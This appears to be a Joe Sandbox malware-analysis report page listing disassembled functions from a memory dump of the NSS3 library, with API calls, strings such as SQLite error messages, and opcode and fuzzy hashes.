Part of subcall function 6C541D10: PORT_FreeArena_Util.NSS3(000000B0,00000000,00000000,00000000,00000000,?,6C54C097,00000000,000000B0,?), ref: 6C541D2C
Part of subcall function 6C541D10: SECITEM_CopyItem_Util.NSS3(000000B0,00000004,6C54C09B,00000000,00000000,00000000,?,6C54C097,00000000,000000B0,?), ref: 6C541D3F
Part of subcall function 6C541D10: SECITEM_CopyItem_Util.NSS3(000000B0,-00000010,6C54C087,00000000,000000B0,?), ref: 6C541D54

CERT_CopyName.NSS3(00000000,000000CC,?), ref: 6C54C0AD
SECKEY_CopySubjectPublicKeyInfo.NSS3(00000000,-000000D4,?), ref: 6C54C0C9

Part of subcall function 6C552DD0: SECOID_CopyAlgorithmID_Util.NSS3(-000000D4,-00000004,6C54C0D2,6C54C0CE,00000000,-000000D4,?), ref: 6C552DF5
Part of subcall function 6C552DD0: SECITEM_CopyItem_Util.NSS3(-000000D4,-0000001C,?,?,?,?,6C54C0CE,00000000,-000000D4,?), ref: 6C552E27

CERT_DestroyCertificate.NSS3(00000000), ref: 6C54C0D6
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C54C0E3

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Copy$Arena$Alloc_Arena_$FreeItem_$IntegerNameValue$AlgorithmAllocateCertificateCriticalDestroyEnterGrow_InfoInitLockPoolPublicSectionSubjectUnlockcallocmemcpymemset
String ID:
API String ID: 3955726912-0
Opcode ID: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
Instruction ID: 4e2e24c35f962b1f6ecbc064ee44da58f3a863e8092a9cd687dfab8daad9f79c
Opcode Fuzzy Hash: a0e100b580992dc40121ac9e8a0f33dfbfe694752f39d7853d339443a5b37f32
Instruction Fuzzy Hash: D92147F6540205A7FB016A61AD81FFF366C9B8175DF088134FD08D9646FB26E91D83B2

Function 6C542E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON

Download Yara Rule

APIs

SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C542CDA,?,00000000), ref: 6C542E1E

Part of subcall function 6C59FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C549003,?), ref: 6C59FD91
Part of subcall function 6C59FD80: PORT_Alloc_Util.NSS3(A4686C5A,?), ref: 6C59FDA2
Part of subcall function 6C59FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686C5A,?,?), ref: 6C59FDC4

SECITEM_DupItem_Util.NSS3(?), ref: 6C542E33

Part of subcall function 6C59FD80: free.MOZGLUE(00000000,?,?), ref: 6C59FDD1

TlsGetValue.KERNEL32 ref: 6C542E4E
EnterCriticalSection.KERNEL32(?), ref: 6C542E5E
PL_HashTableLookup.NSS3(?), ref: 6C542E71
PL_HashTableRemove.NSS3(?), ref: 6C542E84
PL_HashTableAdd.NSS3(?,00000000), ref: 6C542E96
PR_Unlock.NSS3 ref: 6C542EA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C542EB6
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C542EC5

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
String ID:
API String ID: 3332421221-0
Opcode ID: 934488e554e8a5cd6eed31ca0ce216a6d72ed4b33bdaf5bf33020af91e7eec3b
Instruction ID: c33537090c0618b16fb9fccb1adc48c5ac09707bd331b089c48c1f86428c27c5
Opcode Fuzzy Hash: 934488e554e8a5cd6eed31ca0ce216a6d72ed4b33bdaf5bf33020af91e7eec3b
Instruction Fuzzy Hash: 0821D072A40111A7EB005B67AC49EAB3B79AF92349F044120ED1CC6721FB32E968D6A5

Function 6C52FC50 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6C52FD18
sqlite3_initialize.NSS3 ref: 6C52FD5F
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C52FD89
memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6C52FD99
sqlite3_free.NSS3(00000000), ref: 6C52FE3C
sqlite3_free.NSS3(?), ref: 6C52FEE3
sqlite3_free.NSS3(?), ref: 6C52FEEE

Strings

simple, xrefs: 6C52FC79

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: sqlite3_free$sqlite3_initialize$memcpymemset
String ID: simple
API String ID: 1130978851-3246079234
Opcode ID: ca013e9fb39e5415a0a1fa3bdb5c3656a5fef971adf599c7609448919015c30f
Instruction ID: f6a4de883e0fd4a7d99d329e3ddb5a3988a89852e70b2724a690c98bb0ffed40
Opcode Fuzzy Hash: ca013e9fb39e5415a0a1fa3bdb5c3656a5fef971adf599c7609448919015c30f
Instruction Fuzzy Hash: 3A917EB0A012159FDB04CF55DD80AAAB7F1FF85318F248669D8199BB92E739E801CB90

Function 6C535CE0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 229COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C535EC9
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000296F7,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C535EED

Strings

unable to close due to unfinalized statements or unfinished backups, xrefs: 6C535E64
%s at line %d of [%.10s], xrefs: 6C535EE0
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C535ED1
API call with %s database connection pointer, xrefs: 6C535EC3
misuse, xrefs: 6C535EDB
invalid, xrefs: 6C535EBE

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse$unable to close due to unfinalized statements or unfinished backups
API String ID: 632333372-1982981357
Opcode ID: e2a29e9e2c7454d1242445ca05f779a94332247c49cc9d23da0b26e4332e39d8
Instruction ID: 0ab8e87e971fbafb30d77d08e21560a04ad42af1986fc0e8679f52d46bd54e50
Opcode Fuzzy Hash: e2a29e9e2c7454d1242445ca05f779a94332247c49cc9d23da0b26e4332e39d8
Instruction Fuzzy Hash: 8381D170B056219BEB1ACF65CC48B6A7370BF41308F983A68D81D5BB91E730E946CBD5

Function 6C51DCC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 225COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C51DDF9
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C51DE68
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C51DE97
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C51DEB6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C51DF78

Strings

%s at line %d of [%.10s], xrefs: 6C51DE61, 6C51DE90
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C51DE52, 6C51DE81
database corruption, xrefs: 6C51DE5C, 6C51DE8B

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1526119172-598938438
Opcode ID: b49b44efd781e83a0f11ca3c3d8b6114113951687eaa54230e13c5031fab01b7
Instruction ID: 70836f0f4086cca79e6d89611e595167339fa5b2665e40053e343f8cc252e0dd
Opcode Fuzzy Hash: b49b44efd781e83a0f11ca3c3d8b6114113951687eaa54230e13c5031fab01b7
Instruction Fuzzy Hash: 3C81A0717083009FE715DF25CC88B6A77F1AF85308F14892DE89A8BE51EB35E845CB92

Function 6C4CCEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C4CB999), ref: 6C4CCFF3
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6C4CB999), ref: 6C4CD02B
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6C4CB999), ref: 6C4CD041
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C4CB999), ref: 6C61972B

Strings

%s at line %d of [%.10s], xrefs: 6C4CCFEC, 6C4CD018, 6C4CD029, 6C4CD03F, 6C61978B
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C4CCFDD, 6C4CD00E, 6C4CD022, 6C4CD033, 6C619780
database corruption, xrefs: 6C4CCFE7, 6C4CD013, 6C4CD028, 6C4CD039, 6C4CD03E, 6C619786

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: sqlite3_log$_byteswap_ushort
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 491875419-598938438
Opcode ID: 3f1b46f4e431c8d13e462a7965133565ac9d22df3e65958d9363550bc7a54d32
Instruction ID: 557c0330e6b865587b7e534c1bec4792accda941802c3ffdcbd9d124ad0fa460
Opcode Fuzzy Hash: 3f1b46f4e431c8d13e462a7965133565ac9d22df3e65958d9363550bc7a54d32
Instruction Fuzzy Hash: 08611675A042108BD310CF29C840FA6B7F5EF95319F2845ADE4499BB82D376D847CBA6

Function 6C5CFFF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 192memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5D5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C5D5B56

PK11_FreeSymKey.NSS3(00000000), ref: 6C5D0113
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5D0130
PORT_Alloc_Util.NSS3(00000040), ref: 6C5D015D
memcpy.VCRUNTIME140(-00000042,?,?), ref: 6C5D01AF
PR_SetError.NSS3(FFFFD056,00000000), ref: 6C5D0202
free.MOZGLUE(?), ref: 6C5D0224
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5D0253

Strings

exporter, xrefs: 6C5D00F7

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Error$Alloc_FreeIdentitiesK11_LayerUtilfreememcpy
String ID: exporter
API String ID: 712147604-111224270
Opcode ID: e9af0fbf45a9f3155f3a77d9715048d4d8c07ffaec1f61323c323af9fb9a820c
Instruction ID: feda9b1a9902777c880b01e835d9337a3d32ca5aa8bd03c9198d3ac1feeaa934
Opcode Fuzzy Hash: e9af0fbf45a9f3155f3a77d9715048d4d8c07ffaec1f61323c323af9fb9a820c
Instruction Fuzzy Hash: 26611271D003899BEF018FA8CC01BEE77B6FFC4308F15462AE91A5A651E731E954CB59

Function 6C5A4DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C5A536F,00000022,?,?,00000000,?), ref: 6C5A4E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6C5A4F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C5A4F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C5A4FAE
free.MOZGLUE(?), ref: 6C5A4FC8

Strings

%s=%c%s%c, xrefs: 6C5A4FA9
oSZl", xrefs: 6C5A4DFB, 6C5A4EF4, 6C5A4EC5
%s=%s, xrefs: 6C5A4F89

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s$oSZl"
API String ID: 2709355791-1092450866
Opcode ID: d6515bb7f875547de885724de6db79fc9e66a6c26d3c2d8a86a0974112a245db
Instruction ID: 20fe6ba61b6ae83a6ea9155ace1447a0a94bf343ff99f759a69cb751c25d271d
Opcode Fuzzy Hash: d6515bb7f875547de885724de6db79fc9e66a6c26d3c2d8a86a0974112a245db
Instruction Fuzzy Hash: 81514C31A051469BEF01CAEBCC907FF7BF59F46308F18A125E894A7B41DB35980787A2

Function 6C5CEF30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,?,6C5EA4A1,?,00000000,?,00000001), ref: 6C5CEF6D

Part of subcall function 6C5EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5EC2BF

htonl.WSOCK32(00000000,?,6C5EA4A1,?,00000000,?,00000001), ref: 6C5CEFE4
htonl.WSOCK32(?,00000000,?,6C5EA4A1,?,00000000,?,00000001), ref: 6C5CEFF1
memcpy.VCRUNTIME140(?,?,6C5EA4A1,?,00000000,?,6C5EA4A1,?,00000000,?,00000001), ref: 6C5CF00B
memcpy.VCRUNTIME140(?,00000000,?,?,?,00000000,?,6C5EA4A1,?,00000000,?,00000001), ref: 6C5CF027

Strings

dtls13, xrefs: 6C5CEF33

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: htonlmemcpy$ErrorValue
String ID: dtls13
API String ID: 242828995-1883198198
Opcode ID: 9553615897a4281890b4ee3997a0f0b236510e0b16216a1c11c924d9beaa3fa6
Instruction ID: a79e3bc9bd920952a04beef78d16c47ab6b650ee2a7ebd1d53aa16d526e3162d
Opcode Fuzzy Hash: 9553615897a4281890b4ee3997a0f0b236510e0b16216a1c11c924d9beaa3fa6
Instruction Fuzzy Hash: 38311671A00211AFCB10CF68CC81B8AB7E4EF49358F25802DE8199B751E731E915CBE6

Function 6C54AF60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C54AFBE
SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C669500,6C543F91), ref: 6C54AFD2

Part of subcall function 6C59B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6718D0,?), ref: 6C59B095

DER_GetInteger_Util.NSS3(?), ref: 6C54B007

Part of subcall function 6C596A90: PR_SetError.NSS3(FFFFE009,00000000,?,00000000,?,6C541666,?,6C54B00C,?), ref: 6C596AFB

PR_SetError.NSS3(FFFFE009,00000000), ref: 6C54B02F
PR_CallOnce.NSS3(6C6A2AA4,6C5A12D0), ref: 6C54B046
PL_FreeArenaPool.NSS3 ref: 6C54B058
PL_FinishArenaPool.NSS3 ref: 6C54B060

Strings

security, xrefs: 6C54AFB8

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: ArenaErrorPool$Util$CallDecodeFinishFreeInitInteger_Item_OnceQuick
String ID: security
API String ID: 3627567351-3315324353
Opcode ID: 6493d51a32c86bbacde88b87ae5b14ea54682691570c338999a52da9613586d6
Instruction ID: c9e8b57feb790126077c2f311c0e219866d3844916dfa0d89a455f0d529daf2d
Opcode Fuzzy Hash: 6493d51a32c86bbacde88b87ae5b14ea54682691570c338999a52da9613586d6
Instruction Fuzzy Hash: 1E310870404300DBDB10DF159C44BAE77A4AF8636EF108B19E9785BBD1E7329909CB9B

Function 6C543E60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 6C5440D0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6C543F7F,?,00000055,?,?,6C541666,?,?), ref: 6C5440D9
Part of subcall function 6C5440D0: SECITEM_CompareItem_Util.NSS3(00000000,?,?,?,6C541666,?,?), ref: 6C5440FC
Part of subcall function 6C5440D0: PR_SetError.NSS3(FFFFE023,00000000,?,?,6C541666,?,?), ref: 6C544138

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C543EC2
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C543ED6

Part of subcall function 6C59B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C6718D0,?), ref: 6C59B095

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C543EEE

Part of subcall function 6C59FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C598D2D,?,00000000,?), ref: 6C59FB85
Part of subcall function 6C59FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C59FBB1

PR_CallOnce.NSS3(6C6A2AA4,6C5A12D0), ref: 6C543F02
PL_FreeArenaPool.NSS3 ref: 6C543F14
PL_FinishArenaPool.NSS3 ref: 6C543F1C

Part of subcall function 6C5A64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C5A127C,00000000,00000000,00000000), ref: 6C5A650E

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C543F27

Strings

security, xrefs: 6C543EBC

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$ArenaItem_$Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_Zfreefreememcpy
String ID: security
API String ID: 1076417423-3315324353
Opcode ID: 005b88acf4a18918f973bf68bf2b667362d6ef93a27912008e4dfd66d4bdc45b
Instruction ID: f18787e3d806e260f43cb84ba6f8bdc57bd3f26166fde31d8c1ca730f96148f0
Opcode Fuzzy Hash: 005b88acf4a18918f973bf68bf2b667362d6ef93a27912008e4dfd66d4bdc45b
Instruction Fuzzy Hash: AE2148B1A04300ABD3148F16AC41FAB77B8EB8530CF004A3DF959A7741E731D9188B9A

Function 6C58CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6C58CD08
PK11_DoesMechanism.NSS3(?,?), ref: 6C58CE16
PR_SetError.NSS3(00000000,00000000), ref: 6C58D079

Part of subcall function 6C5EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5EC2BF

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: 0983a0f836189649b9de1698fe4bf8afe75eebc92a3001ba7a65c4f99b4676dc
Instruction ID: 754357942093cccf39ad3cbc96be92d2daec06483b0f7b07d0840ca7d8e8fd6d
Opcode Fuzzy Hash: 0983a0f836189649b9de1698fe4bf8afe75eebc92a3001ba7a65c4f99b4676dc
